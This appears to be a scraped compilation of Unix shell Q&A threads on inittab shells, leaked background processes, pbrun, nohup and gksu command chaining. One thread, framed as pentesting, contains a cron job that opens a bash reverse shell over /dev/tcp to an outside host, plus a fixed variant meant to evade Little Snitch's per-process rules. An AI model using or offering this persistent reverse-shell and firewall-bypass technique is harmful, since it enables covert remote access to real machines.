How to start a linux shell as from /etc/inittab - bash

We used to have two entries in our /etc/inittab:
::sysinit:/etc/init.d/rcS
ttyS0::respawn:-/bin/sh
rcS is a shell script which normally starts our application, but in a special case we called "return" to terminate it which apparently lets the /bin/sh take over the tty as we got a shell prompt where we could do some maintenance.
Now the inittab looks like this:
::once:/etc/init.d/rcS
We now start the shell by executing "/bin/bash -i" in the rcS script, as we don't want to always run a second shell (due to memory constraints) which is normally never used.
But the created bash doesn't feature job control, which is very limiting.
So my question is, can I create a shell (and maybe terminate the rcS script) the same way the init processed did in our previous solution so that I get again a shell with job control?

This depends on exactly what OS you are running. Here is an example which works on RHEL/CentOS.
6:2345:respawn:/sbin/mingetty --autologin root tty6
Here is what someone else did for a similar trick.
openvt -f -c 12 -w -- sh -c "unicode_start; echo -e '$NORPT'; exec $LOGINSH" >/dev/tty1

Related

shell: clean up leaked background processes which hang due to shared stdout/stderr

I need to run essentially arbitrary commands on a (remote) shell in ephemeral containers/VMs for a test execution engine. Sometimes these leak background processes which then cause the entire command to hang. This can be boiled down to this simple command:
$ sh -c 'sleep 30 & echo payload'
payload
$
Here the backgrounded sleep 30 plays the role of a leaked process (which in reality will be something like dbus-daemon) and the echo is the actual thing I want to run. The sleep 30 & echo payload should be considered as an atomic opaque example command here.
The above command is fine and returns immediately as the shell's and also sleep's stdout/stderr are a PTY. However, when capturing the output of the command to a pipe/file (a test runner wants to save everything into a log, after all), the whole command hangs:
$ sh -c 'sleep 30 & echo payload' | cat
payload
# ... does not return to the shell (until the sleep finishes)
Now, this could be fixed with some rather ridiculously complicated shell magic which determines the FDs of stdout/err from /proc/$$/fd/{1,2}, iterating over ls /proc/[0-9]*/fd/* and killing every process which also has the same stdout/stderr. But this involves a lot of brittle shell code and expensive shell string comparisons.
Is there a way to clean up these leaked background processes in a more elegant and simpler way? setsid does not help:
$ sh -c 'setsid -w sh -c "sleep 30 & echo payload"' | cat
payload
# hangs...
Note that process groups/sessions and killing them wholesale isn't sufficient as leaked processes (like dbus-daemon) often setsid themselves.
P.S. I can only assume POSIX shell or bash in these environments; no Python, Perl, etc.
Thank you in advance!
We had this problem with parallel tests in Launchpad. The simplest solution we had then - which worked well - was just to make sure that no processes share stdout/stdin/stderr (except ones where you actually want to hang if they haven't finished - e.g. the test workers themselves).
Hmm, having re-read this I cannot give you the solution you are after (use systemd to kill them). What we came up with is to simply ignore the processes but reliably not hang when the single process we were waiting for is done. Note that this is distinctly different from the pipes getting closed.
Another option, not perfect but useful, is to become a local reaper with prctl(2) and PR_SET_CHILD_SUBREAPER. This will allow you to be the parent of all the processes that would otherwise reparent to init. With this arrangement you could try to kill all the processes that have you as ppid. This is terrible but it's the closest best thing to using cgroups.
But note, that unless you are running this helper as root you will find that practical testing might spawn some setuid thing that will lurk and won't be killable. It's an annoying problem really.
Use script -qfc instead of sh -c.

Running a script in PowerBroker

I'm trying to script my commands that are run inside the pbrun shell. I've tried executing through a normal script, but that doesn't work because, to my understanding, pbrun is executed in its won subshell, making it hard, if not impossible, to pass commands to.
The only solution I'm thinking might work is that if I have a input/output text processor that listens to the terminal and responds accordingly.
I was able to send commands to the standard input of pbrun:
echo 'echo $HOSTNAME' | pbrun bash

How to run shell script on VM indefinitely?

I have a VM that I want running indefinitely. The server is always running but I want the script to keep running after I log out. How would I go about doing so? Creating a cron job?
In general the following steps are sufficient to convince most Unix shells that the process you're launching should not depend on the continued existence of the shell:
run the command under nohup
run the command in the background
redirect all file descriptors that normally point to the terminal to other locations
So, if you want to run command-name, you should do it like so:
nohup command-name >/dev/null 2>/dev/null </dev/null &
This tells the process that will execute command-name to send all stdout and stderr to nowhere (instead of to your terminal) and also to read stdin from nowhere (instead of from your terminal). Of course if you actually have locations to write to/read from, you can certainly use those instead -- anything except the terminal is fine:
nohup command-name >outputFile 2>errorFile <inputFile &
See also the answer in Petur's comment, which discusses this issue a fair bit.

OS X: cron job invokes bash but process run is 'sh'

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (as, in OS X, they as essentially the same thing but with slightly different behaviours depending on how invoked).
Any thoughts about how I can stop OS X using sh rather than bash in the cron job. Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!).
The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using fork() and dup2() before execve() or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.

Execute one command after another one finishes under gksu

I'm trying to have a desktop shortcut that executes one command (without a script, I'm just wondering if that is possible). That command requires root privileges so I use gksu in Ubuntu, after I finish typing my password and it is correct I want the other command to run a file. I have this command:
xterm -e "gksu cp /opt/Popcorn-Time/backup/* /opt/Popcorn-Time; /opt/Popcorn-Time/Popcorn-Time"
But Popcorn-Time opens without it waiting for me to finish typing my password (correctly). I want to do this without a seperate script, if possible.
How should I do this?
EDIT: Ah! I see what is going on now, you've all been helping me with causing Popcorn-Time to wait for gksu to finish, but Popcorn-Time isn't going to run without the files in backup, and those are a bit heavy (7 MB total), so it takes a second for them to complete the transfer, then Popcorn-Time is already open by the time the files are copied. Is there a way to wait for Popcorn-Time to wait for the cp command to finish?
I also changed my command above to what I have now.
EDIT #2: Everything I said by now isn't relevant, as the problem with Popcorn-Time isn't what I thought, I didn't need to copy the files over, I just needed to run it as root for it to work. Thanks for everyone who tried to help.
Thanks.
If you want the /opt/popcorntime/Popcorn-time command to wait until the first command finishes, you can separate the commands by && so that the second only executes on successful completion of the first. This is called a compound-command. E.g.:
command1 && command2
With gksu in order to run multiple commands with only a single password entry, you will need:
gksu -- bash -c 'command1 && command2'
In your case:
gnome-terminal -e gksu -- bash -c "cp /opt/popcorntime/backup/* /opt/popcorntime && /opt/popcorntime/Popcorn-Time"
(you may have to adjust quoting to fit your expansion needs)
You can use the or operator in a similar fashion so that the second command only executes if the first fails. E.g.:
command1 || command2
In a console you would do:
gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time
In order to use it as Exec in the .desktop file wrap it like this:
bash -e "gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time"
The problem is that gnome-terminal is only seeing the gksu command as the value to the -e argument and not the Popcorn-Time command.
gnome-terminal forks and returns immediately and so Popcorn-Time runs immediately.
The solution is to quote the entire command string (both commands) so they are (combined) the single argument to -e.

Resources